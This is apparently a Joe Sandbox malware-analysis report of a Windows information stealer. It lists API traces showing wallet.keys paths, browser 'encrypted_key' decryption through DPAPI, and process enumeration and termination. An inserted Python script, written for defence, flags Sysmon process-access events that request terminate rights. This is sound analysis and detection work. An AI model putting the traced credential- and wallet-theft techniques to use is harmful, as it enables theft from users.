                                    • API String ID: 211194620-0
                                    • Opcode ID: 909f4abea9bc5ed8bf3d46392ce319488cab01c0c39857e25710eb69bca87332
                                    • Instruction ID: fe66be1ad797eb0595a10138917235087388d126e6d0711d688322be302a6574
                                    • Opcode Fuzzy Hash: 909f4abea9bc5ed8bf3d46392ce319488cab01c0c39857e25710eb69bca87332
                                    • Instruction Fuzzy Hash: 0D810C72A101489EDB05FBA5DD92EEE7339AF19300F414529F506B6093EF347A09CBA2
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000F1580,000F0D92), ref: 000DF54C
                                    • lstrlen.KERNEL32(00000000), ref: 000DF56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: ed9cdec28f1812845a61eaf22933bb0e4061e67a7f258c1ce7e585a11a5fd93d
                                    • Instruction ID: c7fd225ffbfb38b396f236e1072d1152c48769390dd769b432de13b9871067fd
                                    • Opcode Fuzzy Hash: ed9cdec28f1812845a61eaf22933bb0e4061e67a7f258c1ce7e585a11a5fd93d
                                    • Instruction Fuzzy Hash: 75510D71A00148AEDB04FBA1DD92DED7379AF59300F418529F916B6193EE347A09CBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: fc6b28f4e0fc7da63a9634becdf9d86aa5e46ef8ef2681b70b64f304002c812d
                                    • Instruction ID: bf13f3455ffedfa52adcfe4afe8a4cdd966cebeeb708d6a9dcdfdfbd5f32c41e
                                    • Opcode Fuzzy Hash: fc6b28f4e0fc7da63a9634becdf9d86aa5e46ef8ef2681b70b64f304002c812d
                                    • Instruction Fuzzy Hash: FC414271E14249AFCB04EFB5D845AFEBB74AF48304F04C418E51677251DB75AA09CFA2
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000D9D39
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                      • Part of subcall function 000D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                      • Part of subcall function 000D9AC0: LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                      • Part of subcall function 000D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D9B84
                                      • Part of subcall function 000D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 000D9BA3
                                      • Part of subcall function 000D9B60: LocalFree.KERNEL32(?), ref: 000D9BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 5ecb2cbcbcca8a8225b485b4c06593436d35c5c54eb6542e69d41b4895047f09
                                    • Instruction ID: 6c48bb35d81687bb2d6783f29840bb3aef83faec83cf0a959fd429ec0048f0b2
                                    • Opcode Fuzzy Hash: 5ecb2cbcbcca8a8225b485b4c06593436d35c5c54eb6542e69d41b4895047f09
                                    • Instruction Fuzzy Hash: 57311EB6D10209ABCB04DFE4DD85AEEB7B9AF48304F144519FA05A7246EB349A14CBB1
                                    APIs
                                    • memset.MSVCRT ref: 000E94EB
                                      • Part of subcall function 000E8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E951E,00000000), ref: 000E8D5B
                                      • Part of subcall function 000E8D50: RtlAllocateHeap.NTDLL(00000000), ref: 000E8D62
                                      • Part of subcall function 000E8D50: wsprintfW.USER32 ref: 000E8D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000E95AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E95C9
                                    • CloseHandle.KERNEL32(00000000), ref: 000E95D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 97f500e01f23649c3b2824d3bbebe772fd81b09365bea9dffba7659bc17edd62
                                    • Instruction ID: fd20e0c950bffbc78bad7a04ac31b14f9719d925bf12511cef8fde7ba54b5fdb
                                    • Opcode Fuzzy Hash: 97f500e01f23649c3b2824d3bbebe772fd81b09365bea9dffba7659bc17edd62
                                    • Instruction Fuzzy Hash: 06311A71A01348AFDB15DBE0CD49BEDB7B8EB48701F208459E506AA184DB74AA89CB52
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000F05B7), ref: 000E86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 000E86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 000E86F3
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • CloseHandle.KERNEL32(?), ref: 000E8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 0f54a6ed51e3e572cf2b4124fa8c0f949732497495cc7eb3115d5a7a280e146e
                                    • Instruction ID: a9893e8950d8ca9794227acef2786f1aa3fc111ce1edc4aefd67c4171b779185
                                    • Opcode Fuzzy Hash: 0f54a6ed51e3e572cf2b4124fa8c0f949732497495cc7eb3115d5a7a280e146e
                                    • Instruction Fuzzy Hash: F9316B71A01258AFCB25DF92DD81FEEB778EB49700F108199F10AB61A1DF306A45CFA1
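The two records above belong together: the function at 000E86CA walks the process list with CreateToolhelp32Snapshot/Process32First/Process32Next, and the one at 000E95AB opens a chosen process with OpenProcess(0x1001) and calls TerminateProcess on it. 0x1001 is PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION, which is a usable detection handle: on a host running Sysmon, that request shows up as a ProcessAccess (Event ID 10) record whose GrantedAccess carries the PROCESS_TERMINATE bit. The Python below is an added example written for this report, not the sample's or Joe Sandbox's code; it decodes the access mask and filters constructed EID 10 records. The allowlist of system images and the sample events are assumptions of the example, not data from the report.

```python
"""Flag Sysmon ProcessAccess (Event ID 10) records in which a non-allowlisted
source process asked for PROCESS_TERMINATE, the right the sample requests with
OpenProcess(0x1001) after enumerating processes through Toolhelp32.

Added example (not the sample's or Joe Sandbox's code). The event records are
constructed in the shape a JSON log forwarder emits for Sysmon EID 10.
"""

# Process access rights from winnt.h; 0x1001 == TERMINATE | QUERY_LIMITED_INFORMATION.
PROCESS_ACCESS_NAMES = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_TERMINATE = 0x0001

# Assumed allowlist of system images that legitimately open other processes
# with PROCESS_TERMINATE; tune it for the environment.
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\taskmgr.exe",
}


def decode_access(mask: int) -> list:
    """Translate a GrantedAccess mask into named rights, keeping unknown bits."""
    names = [name for bit, name in sorted(PROCESS_ACCESS_NAMES.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_ACCESS_NAMES)
    if unknown:
        names.append(f"0x{unknown:x}")
    return names


def find_terminate_access(events, allowlist=ALLOWLISTED_SOURCES):
    """Return EID 10 records where a non-allowlisted source asked for PROCESS_TERMINATE."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        mask = int(ev["GrantedAccess"], 16)  # Sysmon renders the mask as "0x..."
        if not mask & PROCESS_TERMINATE:
            continue
        if ev["SourceImage"].lower() in allowlist:
            continue
        hits.append({
            "source": ev["SourceImage"],
            "target": ev["TargetImage"],
            "rights": decode_access(mask),
        })
    return hits


# Constructed events: a user-land binary opening another process with 0x1001,
# a benign limited query, an allowlisted system process, and an unrelated EID 1.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\user\Downloads\file.exe",
     "TargetImage": r"C:\Program Files\Example\app.exe", "GrantedAccess": "0x1001"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Program Files\Example\app.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Example\app.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for hit in find_terminate_access(SAMPLE_EVENTS):
        print(hit["source"], "->", hit["target"], "|".join(hit["rights"]))
```

Sysmon only logs ProcessAccess for targets named in its configuration, so the rule is only as good as the TargetImage coverage; the allowlist is deliberately keyed on the full lower-cased path so that a copy of csrss.exe dropped elsewhere does not inherit the exemption.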
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E00,00000000,?), ref: 000E79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,000F0E00,00000000,?), ref: 000E79C4
                                    • wsprintfA.USER32 ref: 000E79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 3fc9cec830b6a7020a24f6ed1eedd0304f869cf9a7094823ab9b29900c4aed51
                                    • Instruction ID: f54e60e0c94bb0fedd3016661f4b26bb914130495394c1858d1a6b388cfd0411
                                    • Opcode Fuzzy Hash: 3fc9cec830b6a7020a24f6ed1eedd0304f869cf9a7094823ab9b29900c4aed51
                                    • Instruction Fuzzy Hash: 4E1118B2904518AACB14DFCADD45BFEBBFCEB4CB12F10421AF605A2280E2395940C7B1
                                    APIs
                                    • CreateFileA.KERNEL32(000E3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,000E3AEE,?), ref: 000E92FC
                                    • GetFileSizeEx.KERNEL32(000000FF,000E3AEE), ref: 000E9319
                                    • CloseHandle.KERNEL32(000000FF), ref: 000E9327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 7a163a6a4330b9aa4f21e33853e6dcad4d82fb91a9228c6e47f151079b4cda7f
                                    • Instruction ID: 62678ca7281f5dd4c5d15b61f554a4102facc7ec0b9bcfac58f5832bd5fb3869
                                    • Opcode Fuzzy Hash: 7a163a6a4330b9aa4f21e33853e6dcad4d82fb91a9228c6e47f151079b4cda7f
                                    • Instruction Fuzzy Hash: F3F03735E40208BBDB21DBF2DC49B9EB7B9AB4C721F10C254BA61A72C0D670AB018B40
                                    APIs
                                    • __getptd.LIBCMT ref: 000EC74E
                                      • Part of subcall function 000EBF9F: __amsg_exit.LIBCMT ref: 000EBFAF
                                    • __getptd.LIBCMT ref: 000EC765
                                    • __amsg_exit.LIBCMT ref: 000EC773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 000EC797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 41ed3f9cf576d8df5cd8a93266dcad98ff86cc02affc784a61a8c411c091a296
                                    • Instruction ID: b7cc04f7c27a02a9a4133c8c614713ba28a8737a6d4bc74f17c2212cd4023aca
                                    • Opcode Fuzzy Hash: 41ed3f9cf576d8df5cd8a93266dcad98ff86cc02affc784a61a8c411c091a296
                                    • Instruction Fuzzy Hash: 97F0F032A086909FE720BBBA9806BDE33E06F00720F204149F084BA1D3CB296842DE46
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4F7A
                                    • lstrcat.KERNEL32(?,000F1070), ref: 000E4F97
                                    • lstrcat.KERNEL32(?,00B78F98), ref: 000E4FAB
                                    • lstrcat.KERNEL32(?,000F1074), ref: 000E4FBD
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E492C
                                      • Part of subcall function 000E4910: FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                      • Part of subcall function 000E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                      • Part of subcall function 000E4910: FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
